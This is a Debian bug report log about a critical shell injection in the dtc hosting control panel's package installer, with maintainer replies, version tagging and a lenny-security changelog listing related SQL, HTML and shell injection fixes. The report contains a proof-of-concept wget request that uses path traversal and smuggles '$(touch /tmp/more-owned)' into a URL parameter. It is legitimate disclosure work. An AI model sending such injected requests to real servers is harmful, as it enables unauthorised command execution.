Debian Bug report logs - #637630
shell injection in package installer

version graph

Package: src:dtc; Maintainer for src:dtc is Thomas Goirand <zigo@debian.org>;

Reported by: Ansgar Burchardt <ansgar@debian.org>

Date: Sat, 13 Aug 2011 09:03:01 UTC

Severity: critical

Tags: fixed-upstream, security, upstream

Found in versions dtc/0.29.17-1+lenny1, dtc/0.32.10-2

Fixed in versions dtc/0.34.1, dtc/0.29.18-1+lenny2

Done: Thomas Goirand <zigo@debian.org>

Bug is archived. No further changes may be made.

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Thomas Goirand <zigo@debian.org>:
Bug#637630; Package src:dtc. (Sat, 13 Aug 2011 09:03:05 GMT) (full text, mbox, link).


Acknowledgement sent to Ansgar Burchardt <ansgar@debian.org>:
New Bug report received and forwarded. Copy sent to team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Thomas Goirand <zigo@debian.org>. (Sat, 13 Aug 2011 09:03:08 GMT) (full text, mbox, link).


Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Ansgar Burchardt <ansgar@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: shell injection in package installer
Date: Sat, 13 Aug 2011 11:00:01 +0200
Package: src:dtc
Version: 0.32.10-2
Severity: critical
Tags: security upstream

The package installer helpfully allows users to run shell code:

wget -q -O- 'http://localhost:8080/dtc/?adm_login=asd&adm_pass=asdf&action=do_install&pkg=../../../../../../../../../tmp&addrlink=asd.com/package-installer&dtcpkg_directory=$(touch /tmp/more-owned)/tmp/foo&subdomain=www'

Ansgar




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Goirand <zigo@debian.org>:
Bug#637630; Package src:dtc. (Sat, 13 Aug 2011 14:57:03 GMT) (full text, mbox, link).


Acknowledgement sent to Thomas Goirand <thomas@goirand.fr>:
Extra info received and forwarded to list. Copy sent to Thomas Goirand <zigo@debian.org>. (Sat, 13 Aug 2011 14:57:03 GMT) (full text, mbox, link).


Message #10 received at 637630@bugs.debian.org (full text, mbox, reply):

From: Thomas Goirand <thomas@goirand.fr>
To: 637630@bugs.debian.org, 637632@bugs.debian.org
Subject: Re: Bug#637630: shell injection in package installer
Date: Sat, 13 Aug 2011 22:56:17 +0800
On 08/13/2011 05:00 PM, Ansgar Burchardt wrote:
> Package: src:dtc
> Version: 0.32.10-2
> Severity: critical
> Tags: security upstream
> 
> The package installer helpfully allows users to run shell code:
> 
> wget -q -O- 'http://localhost:8080/dtc/?adm_login=asd&adm_pass=asdf&action=do_install&pkg=../../../../../../../../../tmp&addrlink=asd.com/package-installer&dtcpkg_directory=$(touch /tmp/more-owned)/tmp/foo&subdomain=www'
> 
> Ansgar

I'm surprised to see both #637630 #637632, because they've been fixed a
long time ago (the same file in the git has the necessary input checking).

Thomas




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Goirand <zigo@debian.org>:
Bug#637630; Package src:dtc. (Sat, 13 Aug 2011 15:09:03 GMT) (full text, mbox, link).


Message #13 received at 637630@bugs.debian.org (full text, mbox, reply):

From: Ansgar Burchardt <ansgar@debian.org>
To: 637630@bugs.debian.org, 637632@bugs.debian.org
Subject: Re: Bug#637630: shell injection in package installer
Date: Sat, 13 Aug 2011 17:04:45 +0200
Thomas Goirand <thomas@goirand.fr> writes:
> I'm surprised to see both #637630 #637632, because they've been fixed a
> long time ago (the same file in the git has the necessary input checking).

I did look at the sources currently in unstable, not the Git repository.

Ansgar




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Goirand <zigo@debian.org>:
Bug#637630; Package src:dtc. (Sat, 13 Aug 2011 15:45:03 GMT) (full text, mbox, link).


Message #16 received at 637630@bugs.debian.org (full text, mbox, reply):

From: Ansgar Burchardt <ansgar@debian.org>
To: 637630@bugs.debian.org, 637632@bugs.debian.org
Subject: Re: Bug#637630: shell injection in package installer
Date: Sat, 13 Aug 2011 17:40:44 +0200
found 637630 0.29.17-1+lenny1
tag 637630 fixed-upstream
found 637632 0.29.17-1+lenny1
tag 637632 fixed-upstream
thanks

Ansgar Burchardt <ansgar@debian.org> writes:
> Thomas Goirand <thomas@goirand.fr> writes:
>> I'm surprised to see both #637630 #637632, because they've been fixed a
>> long time ago (the same file in the git has the necessary input checking).
>
> I did look at the sources currently in unstable, not the Git repository.

Indeed there seems to be a patch in Git for these issues[1].  If they
are known since April, why have they been fixed in neither unstable nor
oldstable?

Ansgar

[1] <http://git.gplhost.com/gitweb/?p=dtc.git;a=commitdiff;h=541d8457a6989a1a925bb866ed972a5f07c2de64>




Bug Marked as found in versions dtc/0.29.17-1+lenny1. Request was from Ansgar Burchardt <ansgar@debian.org> to control@bugs.debian.org. (Sat, 13 Aug 2011 15:45:06 GMT) (full text, mbox, link).


Added tag(s) fixed-upstream. Request was from Ansgar Burchardt <ansgar@debian.org> to control@bugs.debian.org. (Sat, 13 Aug 2011 15:45:07 GMT) (full text, mbox, link).


Bug Marked as fixed in versions dtc/0.34.1. Request was from Thomas Goirand <thomas@goirand.fr> to control@bugs.debian.org. (Wed, 14 Sep 2011 16:21:10 GMT) (full text, mbox, link).


Reply sent to Thomas Goirand <thomas@goirand.fr>:
You have taken responsibility. (Mon, 19 Dec 2011 02:57:12 GMT) (full text, mbox, link).


Notification sent to Ansgar Burchardt <ansgar@debian.org>:
Bug acknowledged by developer. (Mon, 19 Dec 2011 02:57:12 GMT) (full text, mbox, link).


Message #27 received at 637630-done@bugs.debian.org (full text, mbox, reply):

From: Thomas Goirand <thomas@goirand.fr>
To: 637630-done@bugs.debian.org
Subject: Also fixed in Lenny
Date: Mon, 19 Dec 2011 10:55:40 +0800



Reply sent to Thomas Goirand <zigo@debian.org>:
You have taken responsibility. (Mon, 19 Dec 2011 20:06:26 GMT) (full text, mbox, link).


Notification sent to Ansgar Burchardt <ansgar@debian.org>:
Bug acknowledged by developer. (Mon, 19 Dec 2011 20:06:26 GMT) (full text, mbox, link).


Message #32 received at 637630-close@bugs.debian.org (full text, mbox, reply):

From: Thomas Goirand <zigo@debian.org>
To: 637630-close@bugs.debian.org
Subject: Bug#637630: fixed in dtc 0.29.18-1+lenny2
Date: Mon, 19 Dec 2011 20:04:29 +0000
Source: dtc
Source-Version: 0.29.18-1+lenny2

We believe that the bug you reported is fixed in the latest version of
dtc, which is due to be installed in the Debian FTP archive:

dtc-common_0.29.18-1+lenny2_all.deb
  to main/d/dtc/dtc-common_0.29.18-1+lenny2_all.deb
dtc-core_0.29.18-1+lenny2_all.deb
  to main/d/dtc/dtc-core_0.29.18-1+lenny2_all.deb
dtc-cyrus_0.29.18-1+lenny2_all.deb
  to main/d/dtc/dtc-cyrus_0.29.18-1+lenny2_all.deb
dtc-postfix-courier_0.29.18-1+lenny2_all.deb
  to main/d/dtc/dtc-postfix-courier_0.29.18-1+lenny2_all.deb
dtc-stats-daemon_0.29.18-1+lenny2_all.deb
  to main/d/dtc/dtc-stats-daemon_0.29.18-1+lenny2_all.deb
dtc-toaster_0.29.18-1+lenny2_all.deb
  to main/d/dtc/dtc-toaster_0.29.18-1+lenny2_all.deb
dtc_0.29.18-1+lenny2.diff.gz
  to main/d/dtc/dtc_0.29.18-1+lenny2.diff.gz
dtc_0.29.18-1+lenny2.dsc
  to main/d/dtc/dtc_0.29.18-1+lenny2.dsc
dtc_0.29.18.orig.tar.gz
  to main/d/dtc/dtc_0.29.18.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 637630@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Thomas Goirand <zigo@debian.org> (supplier of updated dtc package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

Format: 1.8
Date: Sun, 11 Sep 2011 05:15:26 +0000
Source: dtc
Binary: dtc-common dtc-core dtc-cyrus dtc-postfix-courier dtc-stats-daemon dtc-toaster
Architecture: source all
Version: 0.29.18-1+lenny2
Distribution: lenny-security
Urgency: low
Maintainer: Thomas Goirand <zigo@debian.org>
Changed-By: Thomas Goirand <zigo@debian.org>
Description: 
 dtc-common - web control panel for admin and accounting hosting services (comm
 dtc-core   - web control panel for admin and accounting hosting services (fewe
 dtc-cyrus  - web control panel for admin and accounting hosting services (cyru
 dtc-postfix-courier - web control panel for admin and accounting hosting services (more
 dtc-stats-daemon - dtc-xen VM statistics for the dtc web control panel
 dtc-toaster - web control panel for admin and accounting hosting services (meta
Closes: 637469 637477 637485 637487 637537 637584 637618 637629 637630 637632 637669
Changes: 
 dtc (0.29.18-1+lenny2) lenny-security; urgency=low
 .
   * QA upload fixing:
     - Removed old iGlobalWall folder which included unwanted information.
     - Removed sourceless OSX mod_log_sql.so files (Closes: #637469).
     - Fixes lists shell injection issue (Closes: #637477).
     - Sets unix rights to non-world readable for the apache2.conf file,
     since it contains SQL access password (Closes: #637485).
     - Now htmlspecialchars() the output of DNS & MX, preventing a possible
     HTML injection issue (Closes: #637584).
     - Fixes "package installer includes php files in untrusted directories"
     if some package install packages are installed (Closes: #637629, #637630).
     - Adds htmlspecialchars() in the ticket display.
     - Fixes sudo access to chrootuid is giving access to root using the new
     dtc-chroot-wrapper (Closes: #637618).
     - Not using htpasswd -b to create .htpasswd files (Closes: #637537).
     - Checks $_SERVER["addrlink"] input correctly, since it could lead to very
     bad SQL insertion (Closes: #637487 ).
     - Fixes an SQL injection in package installer (Closes: #637632).
     - Fixes an SQL injection in the draw_user_admin.php (Closes: #637669).
Checksums-Sha1: 
 9e7675783f6ac3070dc332da98febc2af28894b6 1250 dtc_0.29.18-1+lenny2.dsc
 bdf1bef7c5d7e9d61892bc3875925503363354f5 7301006 dtc_0.29.18.orig.tar.gz
 b5e77fbbae9e27735c82751abc1ac0077146a002 78746 dtc_0.29.18-1+lenny2.diff.gz
 4445b341c0a0566e1f93325712fbd807bed799ab 1912204 dtc-common_0.29.18-1+lenny2_all.deb
 79612b46702ccd4823e1d8060eea8497cbe83d72 70510 dtc-core_0.29.18-1+lenny2_all.deb
 7456c345f99006e82795eb718e5d249606e8ddcd 70626 dtc-cyrus_0.29.18-1+lenny2_all.deb
 9edf5d6c9463161b49431da1a9ea8a65fd146cf0 72150 dtc-postfix-courier_0.29.18-1+lenny2_all.deb
 e145c361efd75c81675bdbd92c98eee47b2365af 31420 dtc-stats-daemon_0.29.18-1+lenny2_all.deb
 6f4e57a97ea09e1c647225199c0c2b6fa693a965 25814 dtc-toaster_0.29.18-1+lenny2_all.deb
Checksums-Sha256: 
 0205a5938ae0faee16d2d3d8df2d6fa9b311aae37c906c854ef585a981b8d3af 1250 dtc_0.29.18-1+lenny2.dsc
 4c6c116a378641114310bfa4c0595945f8077e222292577d060f0d7f32be37b9 7301006 dtc_0.29.18.orig.tar.gz
 e6741fced0c57c63d3b64dfc86c4b78361bd28c0b21c47b739fa8e478612dcca 78746 dtc_0.29.18-1+lenny2.diff.gz
 aad9db66e62d2f24c3b56d35a6c46d553f52a6361d82db873aecfaed65dcf124 1912204 dtc-common_0.29.18-1+lenny2_all.deb
 6574b290ee7ef3a68487bc6adf9be43ef10cf753bbbec0eea4ee6c0e2dfc2414 70510 dtc-core_0.29.18-1+lenny2_all.deb
 ae3ce5943e2b9cec34fa1b6c6f77cd1e035992e844ed890432a34338fc15091d 70626 dtc-cyrus_0.29.18-1+lenny2_all.deb
 a0988321c1edca4e4f68ecce6250cd404e84286f430007e90a94c3928acf9293 72150 dtc-postfix-courier_0.29.18-1+lenny2_all.deb
 2b5e79c3bf8972499b1640e905068efdee6a67edbd713d2b5f8f95949d8c1c0a 31420 dtc-stats-daemon_0.29.18-1+lenny2_all.deb
 e88ef80dedf21e996b36328a27a5be300c3b4fdeaedfe5781dc3d4ac17b3e617 25814 dtc-toaster_0.29.18-1+lenny2_all.deb
Files: 
 a3f3e14f6ea3d0cdceec1c80727160e8 1250 admin extra dtc_0.29.18-1+lenny2.dsc
 a974267096479c55720c8d7e3c00ae6d 7301006 admin extra dtc_0.29.18.orig.tar.gz
 79129db9e54025fe4a08f590249caf3c 78746 admin extra dtc_0.29.18-1+lenny2.diff.gz
 351c2f7d94f8fa02cc6fc85f7ecdc3a9 1912204 admin extra dtc-common_0.29.18-1+lenny2_all.deb
 eaaa9dfc160479f3a8cb4662087cf4dc 70510 admin extra dtc-core_0.29.18-1+lenny2_all.deb
 517eedc29e40d13333d713245e0435aa 70626 admin extra dtc-cyrus_0.29.18-1+lenny2_all.deb
 b46683262492c05b7096e4f81322fb56 72150 admin extra dtc-postfix-courier_0.29.18-1+lenny2_all.deb
 30edcbb544f59beb9e0949c6836a0380 31420 admin extra dtc-stats-daemon_0.29.18-1+lenny2_all.deb
 0434325a71c5fa9f6e174ac89f2085b8 25814 admin extra dtc-toaster_0.29.18-1+lenny2_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEAREDAAYFAk5sVVUACgkQl4M9yZjvmkkv1QCffTfT59yeRRJPOunBaCKGLLpT
MowAnR2XE3OKrUWUAuwvJm/6kyhuwPxJ
=J5w+
-----END PGP SIGNATURE-----





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Tue, 17 Jan 2012 07:36:28 GMT) (full text, mbox, link).


Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Sun Apr 20 02:33:49 2025; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU General Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.